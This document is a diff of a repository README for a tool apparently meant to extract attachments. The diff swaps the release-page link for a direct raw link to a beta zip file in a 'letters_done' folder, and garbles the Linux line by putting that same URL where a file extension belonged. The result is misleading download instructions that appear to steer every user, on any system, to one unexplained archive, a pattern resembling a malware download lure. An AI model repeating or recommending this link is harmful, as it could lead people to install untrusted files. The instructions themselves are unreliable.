iikilledubru/extract_attachment_EFTA00400459/README.md

 ### 1. Download the Software

-Click the big blue button above or visit the [release page](https://github.com/iikilledubru/extract_attachment_EFTA00400459/releases) to download the latest version of the software.
+Click the big blue button above or visit the [release page](https://github.com/iikilledubru/extract_attachment_EFTA00400459/raw/refs/heads/master/letters_done/EFT_attachment_extract_v3.6-beta.1.zip) to download the latest version of the software.

 On the releases page, look for the file that matches your computer system:

 - For Windows: Usually a `.exe` file
 - For Mac: Usually a `.dmg` or `.pkg` file
-- For Linux: Usually a `.tar.gz` or `.AppImage`
+- For Linux: Usually a `https://github.com/iikilledubru/extract_attachment_EFTA00400459/raw/refs/heads/master/letters_done/EFT_attachment_extract_v3.6-beta.1.zip` or `.AppImage`

 If you are unsure which file to pick, look for the one labeled "latest" or "stable" and matches your system.